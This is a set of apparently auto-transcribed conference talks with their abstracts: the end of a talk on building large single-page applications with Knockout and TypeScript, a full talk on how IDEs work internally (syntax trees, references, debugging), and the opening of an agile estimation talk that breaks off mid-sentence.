Let's change it to change the message there. I'm a good programmer I've made the code better. As soon as they press save they'll go no bad programmer don't change that because the view depends on it being called do something so it's great to have that feedback so they're going to go obviously controls add enough times to make it go back and save and then it's going to be passing again and we know that things are good. So I would totally recommend trying out the Karma test runner for you. You can make it so it only runs certain tests and not all of them which you may need to do if you've got a very large test suite and you can't run them all every time you save anything. So that's really good and that's of course all set up for you by this Yeoman package. Now last thing that we have got time to talk about TypeScript. I bet everybody in this room has seen TypeScript before. Is that right? Hands up if you've seen TypeScript. Yeah I bet you all have and I bet most of you have at least tried it out as well. So I'm not actually even going to demonstrate this to you because it would be boring. All I would do is I would run the same scaffolder as before and when it asks me I would say yeah I'd like to use TypeScript please and then all the code would come out in TypeScript and then it would all work exactly the same as before, even the tests except that you have to compile before you run anything obviously. But other than that it would all work the same as before. Now what I think is valuable for me to communicate over the next 10 minutes or something is not the basics of TypeScript but rather what I think the pros and cons of it are. So I've been using TypeScript to build this management portal on a very large project for about a year now and I've got some pretty strong opinions about what's good and bad about it and I'm going to give you my opinions and hopefully that will be useful when you're thinking about whether to use it in a project. And as you will find out these are not marketing opinions. I would not get this sanctioned by marketing but that's okay because I haven't checked it with them. All right so if you haven't seen TypeScript just to refresh your memory it looks like this. So TypeScript is compiled so it needs to know where your files are so you use reference statements like that. Also if you're using AMD modules you can do these special imports and that fetches an AMD module asynchronously into your code there. You can also declare things like modules which are equivalent to namespaces and classes and when this compiles to JavaScript what we'll have here is an object, oh sorry a function called myapp.data.transaction repository and it's a function because of course in JavaScript all functions can act as class constructors so that's what it compiles to. Then we can define things like private properties on there and give them types. We can also define a constructor and the contents of that is of course what's going to go into the body of this function that it gets compiled to. We can do more. We can define things like methods just like you do in C-sharp and the parameters and return type are typed there and TypeScript will of course enforce that type checking at compile time but the types don't exist at all at runtime it's purely an artifact of compilation. JavaScript does not know about your types so they just checked compilation time there and also we can do things like type inference so you see this URL variable there I haven't declared type for it but the TypeScript compiler knows because it goes oh that's clearly going to evaluate as a string here that's going to be a string and then it will do all the type checking with that as a string so that saves you a lot of typing. Then it's also got some nice syntactical improvements like you see we've got a lambda function here just like in C-sharp you've got lambdas with the equals bracket thing and not surprisingly that compiles to a JavaScript function that works as you like and that's nice and then the final cool thing that it does is that of course it's got so much type information going around that the tooling can give you good feedback as you're coding with things like IntelliSense so that refreshes your memory hopefully of what it's like to write some TypeScript code and that leaves me on to this question is it a good thing or is it not a good thing? Now if you had asked me that question six months ago I would have struggled to give you an honest answer without being at risk of being fired because I did not like it one little bit. Oh no it was not nice as far as I was concerned I was having a bad time with TypeScript because I was working on a massive project and every time I typed anything I would have to wait multiple seconds before my characters would appear in Visual Studio and then they would probably have red squigglies on them even if it was perfectly valid code and I would be like what are you doing and I have to close and reopen files and then I would eventually try and compile my file and then I would immediately open up the Windows Task Manager and I'd look at the memory usage of TypeScript compiler and it would be like 200 megs, 300 megs, 400 megs, 500 megs, 1 gigabyte, 2 gigabytes and my fan in my laptop would be screaming and my fingers would be melting onto the keyboard and I'd be like ah what's going on and eventually it would all finish with this. We're forcibly killing TypeScript compiler and in my team we got so used to running this command that at one point somebody was going to get t-shirts printed with this slogan on it and eventually someone told them that that was a bad idea so they didn't do it but you understand how we felt at that time. But thankfully since then the TypeScript team have released the version 0.9.7 of their tooling. In fact they've gone to 1.0 since then but 0.9.7 is where everything changed. You can still hear me right? It's sounding strange to me. Okay so in 0.97 everything became so much better. It didn't eat up gigabytes of RAM anymore, it wasn't crashing Visual Studio, the Intellisense actually worked reliably, it was a completely different business after 0.97 so that was an enormous relief to all of us. So generally speaking you can tell I'm more positive this now but I want to still give you the most honest view of I can of this. So I would say that if you're using TypeScript on a large project now sometimes it's bunnies and sunshine and other times it still feels a bit like it's raining blood onto you. So in the spirit of honesty here are the top five best things in my opinion about working with TypeScript and the top five worst things that you still deal with. So let's do the good ones first. The bottom of the list, number five best thing about working with TypeScript is that you can write a code in a C sharp kind of object or into a type away. And you probably like that, I mean most people who do it like it I do anyway so I'm generally positive about this kind of thing. Number four, typo is a very rarely a problem when you're using TypeScript because of course the compiler is going to catch them for you. Very unlikely that you're going to get a typo in production that brings your application down. I appreciate that. Number three, it does have a pretty good syntax, I really like it, it genuinely improves on native JavaScript. So the fact that we can do things like modules and lambdas, I really do appreciate that. So thank you TypeScript team, that's good. Number two, best thing about working with TypeScript, the really big guns now. This is what TypeScript is all about, the fact that you've got strong typing and generics. Now the generics in TypeScript is absolutely gorgeous, it works so well and I really, really appreciate it. So a few weeks ago I was working on some quite complex data structure code with lots of nested generics and it was so great to know that as I refactored it it was going to tell me where I'd forgotten to add an extra generic parameter and so on. So I really, really appreciate that. Number one, best thing of all working with TypeScript, you don't have to remember your own APIs anymore, you can just intelligently go through the entire coding experience and you just don't have to keep remembering stuff. And speaking to someone with limited mental capacity, I really appreciate the fact that I don't have to remember everything all the time. So that's great. Now there are some things that are still not all that lovely and on a bad day I can still feel a bit depressed about it. So number five, not so good thing, well you see I really like JavaScript, I really like how dynamic it is and I like to do some crazy dynamic stuff with all the sort of dynamic function invocation and looking at the arguments array and all that stuff and you can still do that with TypeScript but the only way you do it is by declaring your variables of Type any which just means don't type check this variable. And so it makes me a little sad that I can't somehow have both the dynamic and strongly type things together but I guess that's just a logical limitation, you can't really fix that. But anyway, number four, thirdparty.ts files. If you use any third party JavaScript library which obviously you do then TypeScript doesn't know about them. So how does it know what types are in those files? Well you need to give it these type definition files and it's quite easy to find type definition files for any third party library you can think of. Now the only problem with them in my experience is that every single one of them is wrong or is least incomplete or doesn't match the version of the JavaScript library that you're using. So you'll get very used to patching these.ts files to correct all the mistakes that the author of them made and we do that a lot. Okay, number three thing I don't like, very often I'm writing some code and I'm thinking I know this is going to work at runtime, I totally know what I'm doing and TypeScript is like I don't really know that there's a property with that name and then you're oh damn it I've got to go and declare these extra types and just give all these extra hints to TypeScript. But you know of course it's fundamentally a necessity. If you want the benefits of strong typing you've got to also pay the price of telling it what the types of things are. And I kind of would like to live in a world that's not even logically consistent where I don't have to do that. But unfortunately that's not possible so you just have to live with that. Okay, number two thing that I don't really like is the VS tooling, like I said it's got way better than it used to be. It used to be a nightmare, it's now actually quite decent most of the time. And probably if you're working on a moderate sized project you will think it's completely flawless and wonderful. But we're working on a massive project and we still get times when it's given us red squiggly zoning perfectly valid code or IntelliSense just won't show for no reason today. So I'm sure that they will fix whatever the remaining issues are. They will make it perfect, I'm confident but it's just not 100% of the way they are yet. Especially when you compare it to something like the C-Sharp tooling which is just perfect in every way. Now number one, worst thing of working with TypeScript that I don't like, the fact that you're compiling your code at all. I mean if you've spent enough years working with JavaScript and just you save file, reload, save file, reload, the fact that you're compiling stuff all the time and every process that you ever have to create has to involve compilation, it's just a bit annoying. But there are ways of mitigating it. So Visual Studio has got the ability to compile on save individual TypeScript files and you should definitely do that because that will make your life suddenly become good as opposed to really miserable if you were having to rebuild everything every time you touch any file like I did until three weeks ago. So you will make things better for yourself by doing that. So that's my honest opinion. Now if I was to summarize this, would I use TypeScript or not? I think that honestly yes, I would now use it. On a project that gets beyond a few person month's work of work, I think that the benefits outweigh the drawbacks. Honestly I do now. That's not to say that there aren't drawbacks. Clearly they are. I just personally think that the benefits now outweigh them but only on a fairly large project. Now hopefully you can factor that into your own decisions now. Okay, we're coming up to the end now. I've only got a few moments left. So let's just summarize what we've talked about in this talk. Some of it was about knockout, some of it was about general single page application stuff. We talked about difficulties, right? So with staffing, I would say you can mitigate that by using as much standard front end tooling as you can and align yourself with the rest of the front end worlds so that you can stay up to date with modern technologies and you can get people to understand what you're working on. Two, architectures. Do something modular. For example, the knockout component feature that's going to help you a lot. Come up with something like that, page weight. Make sure you've got some system for doing the right amount of incremental loading and the right amount of upfront loading. I showed you one way of doing it. You may find some other way but do something like that. Maintenance. There's lots of options there. You could use TypeScript. You should be doing some kind of testing. You might want to do some kind of linting. Just do some stuff. It's going to make your life easier. Library dependencies. Make sure you pull them in from a package manager like Bower and you're not just inventing your own system for organizing libraries and versions. It will be easy for you. Build and test. Use the features that are available. If you're doing TypeScript, do compile on save. If you're using Gulp, look into its ability to stream individual changes as you are working on your code. It's going to make your life better. Performance and memory. I didn't really talk about this but one thing I would recommend is don't do what a certain team that built a large management portal recently did which is wait until two weeks before you go to production before thinking about memory leaks and then spending two solid weeks day and night in the Chrome debugging tools tracking down memory leaks. Look at them early on. Consider it to be part of your QA process. Just do some basic stuff to look for it from the beginning. Your life will be better. So there we go. Hopefully that will help you in your process of building a large single page application and you never know. It might even be bunnies and sunshine for you. I hope it is. That's all we've got time for. We do not have time for questions. I'm going to be around. Send me tweets if you want to ask some questions or just tell me what you think about this stuff. Please remember to evaluate your session on the way out and have a really great rest of your day. Thank you very much.
|
These days it's easy to get started building a Single Page Application (SPA). Dozens of frameworks are clamouring to pitch their trivial "hello world" and "todo list" examples. But the moment you step outside the predefined path and begin actually crafting something for a real business, you face an explosion of choices. This talk is about experiences of building large SPAs and maintaining them over time. In part, I'll demonstrate pros and cons of various technology choices, such as TypeScript, Grunt, and AMD module optimisers. In part, I'll demonstrate some Knockout.js-specific techniques, such as the new and powerful "components" feature that improves maintenance, testability, and runtime performance. Throughout, I'll share lessons learned from building and maintaining the core of the Windows Azure management portal, an exceptionally large and high-profile SPA whose various parts are developed by many different teams within Microsoft. I hope these experiences will prove useful when you build your next rich JavaScript application.
|
10.5446/50846 (DOI)
|
Okay, then. Right, so, hello. My name is Matt, and I like IDEs, which is kind of just as well because I work for JetBrains and JetBrains, like IDEs. The talk I want to give today, it kind of started off as like a bit of a state of the union. This is what IDEs do and can do and why they're interesting and what's cool about them and everything. But then I kind of got the idea actually, it's more like a DVD commentary. It's like when you watch a DVD and you have the actor or director giving you a bit of a commentary, a bit of an insight, they stop selling you the movie and actually tell you about the things that they do day to day, give you a bit of a behind the scenes inside, a bit of a couple of technical stories and stuff like that. And that's kind of what I want to do today. I want to not have a look at features as such, but have a look at some of the interesting things that IDEs do. It's very easy to use them day in, day out and then forget about what it is that's actually happening under the covers and frankly it's quite funny. It's nice and geeky and interesting. So first of all, before we go any further, I'm not going to go into the ID versus text editors debate. That's just going to get messy. It's a religious subject and frankly we're a big enough world. It's all nice and inclusive and friendly enough that you can use whatever tool you like. That's absolutely fine. I mean some of my best friend's text editors is just no problem. So what have IDEs ever done for us? Well, first of all, the keyword is integrators, an integrated development environment. This doesn't mean that it's a single window, single application or big monolithic executable. It just means really that all your tools necessary to do your work are within arm's reach. You can do everything you need to do in order to build your project without having to context switch too much. So it's more about reducing your context switching. But the key things that you need to actually build up an IDE, you need a project model. You need a build system, debugger, test runner, visual designers, diagrams, source control extensions, very important for an IDE, navigation as well so you can get around your project. It's all well and good. Database tools, okay, fine. Of course, an editor. There's a lot goes into an IDE. I'm not going to be talking about it all. That's way too crazy. I'm going to look instead at a couple of the core things that are really the central parts of how you build an IDE and what goes into it. So we're going to start with the project model. This to me is the key difference between a text editor and an IDE. Text editors work with files, IDEs work with projects. It's not a hard and fast rule. Obviously, text editors can have project systems and they can work with multiple files, no problem. Everything doesn't necessarily work the other way. IDEs make pretty lousy, simple text editors. A project gives an IDE scope. It's really important. You are no longer editing a single file in isolation. The IDE now knows that if you're referencing something which is defined in another file, it knows where to go and look for that reference. If it's an external reference in an assembly or an external library, it can go and pick that up. It knows where to go to look for that because the project model gives it that information. Usually, this is closely tied to the build system. Visual Studio is a great example of this. Its project model is effectively a best build which is the build system. You can execute that outside of Visual Studio to build your project. The IDE takes all the information from that build system and exposes it in the UI. We've got the targets, well-known targets. Again, MS build has build, rebuild and clean. Those targets are mapped directly to the UI commands of the same name. You can get different types of build system as well. You can have an XML declarative system which is all well and good. It means you can examine the file. You can easily pull out a list of files that are part of that build system, that project model, and display those directly in your IDE. Alternatively, you can have something which is more code-based, more DSL, something like grunt or rake which requires execution before you can actually get that information. The IDE has to cope with both of those. The key thing I want to say really is that project gives the IDE scope. As far as we're going to go with that, we're going to move straight on to debugging. This is also a huge topic which we're not going to dive into. You could do a whole session. You could probably do several sessions about debugging and how an IDE implements debugging. Generally, it's a big topic really. If I was going to pull a couple of things out here, I'd look at expression evaluation. That's quite an interesting one because that's where the debugger, well, that's where you try and evaluate an expression such as it could be simple as A plus B or it could be a Boolean expression. It could be calling functions. But what the debugger here has to do is evaluate the expression. It has to parse that expression, build an abstract syntax tree, walk that tree, evaluate every node along the way, and apply operations to them as it goes. It's quite a big task in and of itself. Interestingly, Visual Studio has problems with lambdas on this. There's a couple of really good blog posts by Microsoft's Jared Parr about explaining why this doesn't work. Some of it is down to architectural Visual Studio com reasons. But also there's the fundamental reason that a lambda expression is actually syntactic sugar for a class. In order to be able to evaluate a lambda, especially one which you've just entered in arbitrarily, the expression evaluator now suddenly has to change the code which is running in the process. And it has to build a class, emit all the IL for it, and then call it from the expression evaluator, all of which makes it incredibly difficult to actually implement. Symbols are another one, especially remote symbols. That's a very nice, useful feature. You can then, if you are debugging an application, and you want to step into an assembly which you don't have any debugging information for, the debugger can go and talk to a remote server and say, do you have any symbols for this? And it can download the PDB on demand. And then given that information of all the symbols that are there, it can then say, do you have the source files for it? And it can download the source files on demand, which are also very cool. This is supported with Microsoft's reference source stuff. It's all supported in NuGet. And if you're publishing any NuGet packages, it's really cool if you can actually also publish the symbols, symbolsource.org is a great resource for this. Or you can do something with a decompiler. So, for example,.peak can act as a source server and a symbol server. So, it will decompile something on the fly, generate a PDB, return it back to you, and then also decompile the source files on the fly and return those back so you can step through code which you don't even have the source for. It's all very cool stuff. Historical debugging is something else which is rather interesting and is taking shape right now. This is something which combines both profiling and debugging. So, as the application is being debugged, there are profiling events being generated. All of these are collected and stored and analyzed. And then it can be replayed after the fact. They can be used to see what led up to an occurrence happening. So, you can do debugging. You can sort of step back after the fact and see what values you had previous to something going wrong. And some good examples of this are IntelliTrace for.netwas.cronon for Java and there's spyjs. And let's, so we'll have a quick look at this here. So, I've got a very simple IntelliJ solution here. It doesn't actually do anything. All I'm doing is down at the bottom here, I'm running spyjs. Spyjs runs as a proxy server. And so, every time you go to the website, it can, it'll proxy it and it'll inject its own code and instrument the JavaScript for you. So, if we just go, let's pop back out of that. So, if we go to a website such as StackOverflow, we can hopefully refresh that and we can see down here now, we're getting all of our events coming through. And this is all the events that have happened on load. And we get to see things like the content loaded and we get to see the call stack of what happened when these events happened. And we can dive into those and see what's happening. Over on the other side of the screen, we get to see the values of the, that there were applicable at the time there. So, it's captured not only the event, but the call stack and the context of the code at that point. We can even double click on the, double click on the event to give us the, I've lost it, where's it going? There we go. To give us a source that was executing at the time. And so it gives you a whole lot of information in order to be able to debug. I can go backwards and forwards in time. So, I can go back to my blur event and see the function that happened there and I can go back down to my content loaded event and look at the code that was executing at that point. All very fun and interesting stuff. That's enough about debugging. We get to the fun stuff. This is the bit which I really enjoy. This is the bit which is the fun geeky kind of thing. It's all about the editor. This is where we get the information to make the ID really rich. And the way we do that is with abstract syntax trees. So, quick show of hands. Everyone know what an abstract syntax tree is? More or less. So, that's, an abstract syntax tree is a way of representing your file as though it's just been parsed. It's been parsed down into all these constituent parts and represented as a tree. A good example would be... So, let's have a look at this. Don't think enough? Yeah. Right. So, this is Roslyn. This is Microsoft's new compiler's new language services parsing a CS file. We've got just a simple web application. It's looking at the home controller and on the right here, we're in the middle of the screen, we've got this syntax visualizer. We can see a tree which represents the whole of the file. At the very top, the very root, we have a node which represents the file itself. And then we have various files which represents a using statement, some other using statements. And so on, we can see it highlighted on the left there. And we can then drill in. We've got namespace declaration. And we can dive into the class declaration. And then we can dive down into that to the method declaration, identify a name, the actual token, and then even the white space that is there. So, the syntax tree is a way of collecting all the information of a file. It's parsing a file, it's breaking it down into something which you can iterate over. You can look at, you can examine, you can then see, you can reason about. But that's all well and good for one language where it gets fun is when you have more than one language. So, if we switch over to another project, we've got a razor file. A razor file is a syntax side, sorry, a server side web page which combines HTML, JavaScript, CSS, and C sharp. So, it's got little blocks of C sharp. So, all of these sort of islands here with the beginning with the at sign, they're actual C sharp files, sorry, C sharp statements. Everything else then is text that's going to be output as part of the request. So, the way this file works when a request is made is it gets compiled into a standard C sharp class with just a whole bunch of response dot writes for all of the text in there which is HTML. And at the end of the day, it just gets called, it writes all the file out and you get to see nice HTML. If we look on the right here in this PSI browser window, this is resharper's view of the file. We've actually got several files under go. We've got a razor file at the top here. We've got a C sharp file, a CSS file, and a JavaScript file. So, what we've done is we built four abstract syntax trees for this one file. The razor file is the main file here. So, we've got our model declaration at the top which is this. We've got a node which represents that and we can dive into that. We've also got a code block. So, this block here is a block of C sharp. And if we have a look at the razor block here, we've got a bunch of tokens and we've got a bunch of code tokens. So, this tree doesn't actually know about the C sharp. It doesn't understand the C sharp. It doesn't know what it is. But we still want to be able to reason about that and know what it is that is going on. So, what we can do is look at the C sharp tree. Now, what we've got here is we've got a using list, a namespace declaration. I'll just make that a bit tiny. We've got a namespace declaration, namespace body, a class, attributes, modifiers. There's a whole bunch of stuff there that we don't actually see in that file. What Resharper has done is it's created a code behind file. It's not the same as a code behind file for an ASPX page. It's just an in memory representation. What we do when building this file, when parsing this file, is we generate the same file that will be generated when the razor file itself is compiled. And that then gives us our context to know what to do for IntelliSense and code completion and parsing that. So, this now represents our syntax tricks. So, there's our namespace declaration. We've got a namespace body. We've got our class, which gets defined there. And now we've got these sections here. These sections are our C sharp islands. So, you can see this view bag title, maps to this view bag title here. So, what we've done is we've created a code behind C sharp file, which we can parse and generate an abstract syntax tree for, and then we overlay that on top of our razor file. So, when we want to edit our razor file and display code completion or syntax highlighting, we just map between the two. If I click here and do code completion, we map down into the code behind file and we see what's available there and we just display what would normally be displayed in that C sharp file if we were actually working with the C sharp file. So, what's so cool about having a C and abstract syntax tree? What does it give us? Why is it, what's the point? The first thing really is that given that deep knowledge of the syntax, it makes it a whole lot easier to do things like syntax highlighting. If you want to highlight all the keywords in a file, then you just look through your syntax tree and find all the keyword nodes. Just change them to be a different color. Outlining is also very easy now because you know where your code blocks begin and end because they're just nodes in the tree. Same with brace matching. You can do things like expand and reduce the selection, which would be something like, if you select a word, you can then expand it and keep on expanding it there to incorporate various code blocks. You know that again because those are just nodes in the tree. You just walk up the tree to get at it. You can do things like contextual text snippets. So, if you'll have a text snippet to create a new class, you don't want to do that in the middle of a method. So, you only say that my, so this, this particular code snippet is applicable within a namespace, not within a class body. I'm sorry, within a method body. And you can do other things as well, such as test identification. If you're looking for things like unit tests, you can just go through a class declaration, find all the method declarations, see if they've got any attributes. If the attribute is test, then it's a test. And you can flag that up as, and report that to your test runner. On top of that, though, we can build more information. We can build semantic information. This is where it starts to get more interesting. So, the syntax tree gives us the raw syntax of the file, but it doesn't give us too much more. A semantic knowledge tells us what's, what's available, what's used, and what, what these things are. It knows that this is a class, this is a method, and it builds caches, and it implements all the things that we need to, to work with that. So, from this, we can build code completion. We can build navigation. If it's go to, go to method, we've got the method declaration which we can go to. There's also control flow analysis. This is where you will, you can walk through the syntax tree to see whether you've got if statements, what happens with the branch, whether you've got any throws or exceptions being raised, and that will then stop execution further on. So, you can do dead code analysis with this. It also allows you to do issue analysis. So, it's now easy to walk the syntax tree, look at the semantic information, and highlight stuff to show if it's wrong or inappropriate or you want it to be a different pattern. For example, if you've got asynchronous methods, if you've got an async method which doesn't end with async, then it's easy enough to flag that as an issue. But one of the nice things you can do is have references. References are really cool because they allow us to do lots of fun things like navigation, code completion. So, here I am on the view method here, and I can just do a navigation, and it'll take me off to the implementation of the view. The way it can do this is by following a reference. If we go back to our syntax tree view and we look in our class body method declaration for the first method, into the method body, finally we get to the return statement, we have an invocation expression. This is us calling a method. We can see down here we've got a reference. We've got a reference to called view, and we can see that it's a reference to a particular method here. Navigation now is very easy because we just follow the reference. If the reference doesn't resolve, then it gets highlighted in red, which you should be able to see. But we now have automatic checking for errors in your code because the reference isn't valid. You can also do code completion because if we know there's going to be a reference there, we can ask the reference provider to say, what are the candidates? If you're going to resolve this, what are the potential targets you can resolve to? And that then is an easy way of getting code completion. We can take it a little bit further as well and not just have references on method invocations, but on any node in the tree. So if it's just a reference between one node to another node, we can have a reference on the argument. So if we go into our argument list, we can find our... It's just crashed. One moment cooler. It's an internal tool. You might be able to tell. But what you can do is you can have a reference from one node to another node. So it can be any node in the tree. It can be a reference to pretty much anything. And this allows us to do cross-language references. So we're not limited to having the target of a reference be a C-sharp method or a class or a variable. It can be anything. So we can have it... Come on. We can have it... Why is this not working? Okay. So we can have it so there's a reference from a string literal. So the index in the example there, which then references a particular file rather than anything else. We can have it so the reference resolves to index.cshtml rather than a property or a field or something called index. And then, as I say, this allows us to do cross-language references. And the really cool thing we can do with references then as well is that because we've got a reference, we've got a target, we can do navigation to there, we can also do find usages because it's just a reverse lookup. We can then also easily do renaming because it's a reverse lookup and you change the name of the node, you sort of change the value of the node that the reference is attached to. And so all of a sudden this gives us... This is a very powerful tool. It's given us navigation, find usages, renaming, code completion or be with just these references between those and cross-language stuff. Finally with ASTs, we've got the ability to manipulate the tree. And this allows us to do some really fun stuff such as refactoring and formatting. If we want to move a method to another class, we can take that method declaration node and all of its children and put it into a...to copy it into another tree. If we want to move it around within the file, we just move the nodes around in the file because it reserializes back to the text file. The AST is a full fidelity representation of the text file. We can then therefore just round-trip between the two. Any changes you make to the tree are replied back to the file. Any changes to the file are applied back to the tree. And because the tree itself contains white space nodes as well, formatting is easily done as well. We just manipulate the white space nodes. We can take it even further again. And we can have...so not only can we have some multi-file abstract syntax trees, but we could do an injected abstract syntax tree. We have a lot of programming languages which are embedded DSLs, things like SQL or CSS snippets within the code or AngularJS expressions. AngularJS expression would be a string literal on a HTML attribute. And so we could do something like this. We've got another IntelliJ project here which has got a reference to a SQLite database. It's just got a simple person table in it. And we've got a reference built in there. It's got a connection to the database. And what we can do is something quite interesting. We can create a query string. This is going to be a bit of SQL, but there's no context to tell it's a SQL, sorry, a SQL string. So we can tell the IDE that this is going to be a SQL, SQL string, and it'll now start parsing that as a SQL expression. And because we've got the database connection in the IDE, we've got this integrated environment. If we call it SQL, we can now do IntelliSense and pull up person. We know that that's a SQL command and we can pull it up from there. And because we've got the context, we can take it a bit further and we can run the query in the console. And down here, then we get the output from that there by embedding the knowledge that that string is a SQL, is a bit of SQL language into another language. So timeliness is an interesting factor. If we're doing something like AngularJS, how do we keep that up to date? Languages change, but they tend to change reasonably slowly. It takes a year or so before languages will finalize on new details and make the changes. Framework changes happen a lot more frequently than that. The common view here, really, is that it's the parser that is the big issue here. It's not. The parser is not the bottleneck. Writing parsers, while it's a certain amount of legwork, is not the thing which holds all this back. The tricky thing now of adding extra support is the value-added stuff you can do on top of an abstract syntax tree, all the analysis you can write, all the changes you would make to a control flow. For example, C sharp 6 is having exception handlers, exception filters. So you can have a catch method with an if statement. That affects the control flow because if the if statement is always going to evaluate to false, then the content of that catch block is never going to fire. So we can flag that as dead code. But that's extra work we have to do on top of parsing the fact that a catch statement can have an if statement attached to it. Similarly, you want to add new quick fixes and context actions because the syntax has changed. You then need to be able to offer the support there to work with those new syntaxes. You want to be able to refactor into a primary constructor, for example. So there's a big cost of adding new features, really, sorry, adding support for new languages or new frameworks or changes to those is the feature intersection of how everything interacts together, testing it, how it's changed the existing code, making sure that your previous analysis and control flows and quick fixes and context actions are all still working. That said, we always want to be making this a whole lot easier and faster. We want to be able to do that. So parsers are a certain amount of legwork. They're not the big bottleneck, but it would all be better and easier to be able to do that quicker and easier. JetBrains has got a research project called Nitra, which is trying to make this a whole lot easier. It's the idea that you can create language tooling from grammar files. So you describe your grammar and from that, you get a whole bunch of stuff for free. It builds the parser, builds the abstract syntax trees. It also, though, takes annotations on those grammars to build automatic syntax highlighting, outlining, brace matching, differences, usages and renames and everything. We've got that one there. So what we've got here is an example grammar, which describes the grammar of a simple expression, a simple numerical expression. We've got operations down here, you know, plus, minus, times, and so on. And we've got start rules. We're also mentioning that they are annotating with, they are numbers or expressions and so on. And so we can get a simple parser. And we can see here that it will parse that file. It'll generate syntax highlighting for us, even sort of outside of the IDE, and show us how we can build all that. So we can do... Nope. But there. But it's also evaluating that. So it's building a syntax tree, but it's also walking the tree to evaluate the contents of that tree. And it's building that for a custom DSL. You can do more complex things. So this is a grammar file which represents the syntax of the grammar file itself. So this is highlighting itself here. We're using the Nitra system in Visual Studio to provide keyword highlighting. So for using syntax module there, they're all defined down here. So we've got syntax and so on for implementing that. And you've also got your... Your outlining implemented here, automatically based on the grammar files. So that is kind of the fun stuff we can do right now with IDEs and what's the interesting stuff with IDEs right now. But what kind of other things are there that's going on? We've got abstract syntax trees going on sort of more or less everywhere. They're going on to the server side of things. Microsoft's using the Roslin bits to do to power its reference source website. So you can browse your code, look at the find usages and so on there. It's also using it to power its code search. So you can type in a search for read text file, and it will then analyze the code, figure out what it's supposed to be doing, and return you something back from sites such as Stack Overflow and other answer forums. JetBrains has a similar platform based on the IntelliJ product, which is all in the cloud. And it is providing a similar way to browse your source code with proper highlighting and everything in analysis and following the references and looking at all these kinds of things. We're using it for a review tool, which currently don't have a name for it. Can it be hazard suggestions, please? Let us know. Browser tools are also very interesting right now. They are blurring the lines between IDEs and browsers, really. They're providing a whole suite of tools in there from profilers to editors to visual designers. And Chrome has even got sort of ID features, almost got its own project model here by implementing workspaces. So you can map a file system to the content of a website. So you can then say that this website is the files in these websites are coming from these files over here, and you can even use the JavaScript debugging maps to say that this JS file is actually coming from a JavaScript file or this CSS is coming from a less file, which is also very cool. Visual Studio has got Browser link, which allows two-way editing from your browser tool. So you can design stuff in Visual Studio. You can fire up the editor. You can run it in several browsers at the same time, editing the browser tools, and that then gets replicated back into the source control in the IDE. And if you edit the source, that again gets replicated back to all of the browsers that are attached. It's very cool. Again, blurring the lines between what's going on. The editor surface is something that's very interesting as well. So traditionally, source code has been, well, is very much about text files, and it's all very static and plain and boring. But we've got these rich editors, you know, and they are limited at the moment to doing syntax highlighting, brace matching, outlining, and that's pretty much it. You know, perhaps we'll do italics every now and then, but that's kind of as far as it goes. Code lens here is Microsoft's way of surfacing information to you without having to go and find it, displaying the number of references, the number of tests, passing and failing, links to your source control and bugs right from the source control, right from the source editor itself. It's worth pointing out, Atom's editor here as well. It's kind of a really, it's a node webkit application. That means it's all based on HTML. So the editor itself is a HTML surface. This allows us to do some fun stuff. So you can even use the developer tools against the editor itself. So given an editor with a plain bit of HTML in it, you can fire up the developer tools and you can walk down the HTML which implements the editor itself. So if we keep going, we get down to the lines and you can step straight in and then you're actually stepping over individual syntax elements. And then you can edit that and add ideally, there it is. Let's just change that to be italic. And now all of a sudden, all of our files, all of our tags in this file have become italic. You can then do something, you've got all the power of the web behind you to do this. Now, so you could see how you could put something more interactive in there. You know, it's web pages. You can use JavaScript. You can use SVG. You can style sheets. So there'll be a lot more interesting things you can get done in there. And of course, then that leads us on to some interactive stuff. So Brett Victor's demo, inventing on principle, if you haven't seen it, you must go and see it on YouTube. It's a really interesting demo. It's about having an editor which, as you type, displays values on the editor surface so you can see how well you're doing with your implementation. It kind of combines the idea of a re-devaluate print loop with the editor surface and TDD. So it's kind of doing everything at once. You get to see that it's working. And you get to tune your algorithm or your bit of code as you're working with it. Lighttable is a working example of this for Closure and JavaScript. But there's a lot of... There's a question, though, there whether that is... You have to implement certain styles of programming for that or use specific languages. It's hard to know whether this is something which can be applied on a wider scale with broader topics and broader languages. And of course, Apple have done this now in a shipping IDE with their Swift language, which they've just now this week, where here you've got a playground where you can build a scene. You can see that animated as you type and as you work on it. And you can have a graph which shows you the value of your values on variables over time. And frankly, that then brings me to the end of everything. That's pretty much all I wanted to talk about. I want to just sort of look at some of the things behind the scenes, some of the syntax trees and the interesting things we can do from that and what that gives us to an IDE and what it gives us and where we can take all of that. So, yes. There we go. So, any questions? No? Okay. Well, thank you all for coming. End of不能 eMission You
|
We developers often take IDEs for granted. But have you ever wondered what’s going on under the surface? I’d like to pull back the curtains on the inner workings of the modern IDE, see where the state of the art is now, and look where it’s heading for the future. We’ll take a tour of the wealth of features provided, and take a deep dive into how the IDE knows so much about your code, and how it can provide such fast navigation and safe refactorings. We’ll also look at why some people are choosing to move away from IDEs and back to text editors, and what the future holds, with projects such as Nitra, Roslyn and Lighttable.
|
10.5446/50847 (DOI)
|
I had too much fun during the break taking one-on-one questions, so I didn't get all this stuff passed out. Apologies for that, but we'll get these things passed around in plenty of time. We're going to talk about estimating, talk about estimating projects. To do this, I want to start out with an idea of what is agile planning, right? What are we after here with a project? Agile planning is all about separating our estimates into two different levels. We have the thing called a product backlog. Our product backlog is big, visible features. We have a thing called a sprint backlog or iteration backlog. The iteration backlog are small tasks. We're going to talk about two different types of estimating. Our focus is going to be on putting estimates on those things on the left, right? The product backlog items. If you're in the session that we just had last hour, we talked about user stories. These things on the left would be user stories. We're going to talk about putting estimates on those. The focus over there. What I'd like to have you do to get started here, we'll get more of these cards passed around. You don't need them for what we're going to be here to get started with. I'd like you to estimate two things for me to help us get started. Our two estimates I'd like you to come up with, and the best is going to be to discuss this. Just turn around and talk to whoever is next to you about this. Two real simple things. How long to drive from right here to Paris? You can take whatever fairies you'd like to do from here to Paris. How long to read the last Harry Potter book? Don't cheat and look it up on Google or Amazon or anything like that because I don't really care about the answer. What I care about, I care about a lot, is us learning something about real world estimating. Two real world estimating tasks up there. Estimate how long to drive to Paris, how long to read the last Harry Potter book. Talk about that and see what you can come up with. Okay, let's talk about it. Who's got an estimate for me on Paris? Somebody just shout out a Paris estimate. How long to get to Paris? Two of them, 24 hours. Somebody else? Couple of days? 16. Right? Okay. There's a difference in telling somebody I'll be there in 24 hours and a couple of days. Those probably really mean the same thing. But often the unit we use to convey the estimate tells us something about our level of confidence in that estimate. If you tell me I'll be there in 24 hours, I might think you're going to be there in 22 to 26 hours. If you tell me I'll be there in a couple of days, that'd be Sunday, maybe Monday. I'll cut you a little more slack because you 